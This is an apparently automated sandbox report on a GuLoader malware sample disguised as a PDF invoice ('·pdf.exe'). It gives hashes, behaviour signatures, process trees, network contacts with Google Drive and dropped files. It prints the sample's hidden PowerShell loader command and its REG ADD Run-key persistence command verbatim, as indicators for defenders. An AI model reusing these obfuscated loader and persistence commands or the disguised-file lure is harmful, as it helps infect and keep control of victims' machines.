Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-ltcejaxejk
Target Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
SHA256 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
Tags
guloader downloader execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7

Threat Level: Known bad

The file Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader downloader execution persistence

Guloader,Cloudeye

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Program crash

NSIS installer

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:49

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win7-20240704-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2428 set thread context of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

MD5 d89dac6d6bcfb431c31bdf7d21f48fbd
SHA1 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256 ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA512 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag

MD5 1a78d0f226d0db154812e61b8cadb4b8
SHA1 e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e
SHA256 19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e
SHA512 b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 2996 -ip 2996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 2492

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgju2ndj.ygv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

MD5 d89dac6d6bcfb431c31bdf7d21f48fbd
SHA1 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256 ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA512 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070
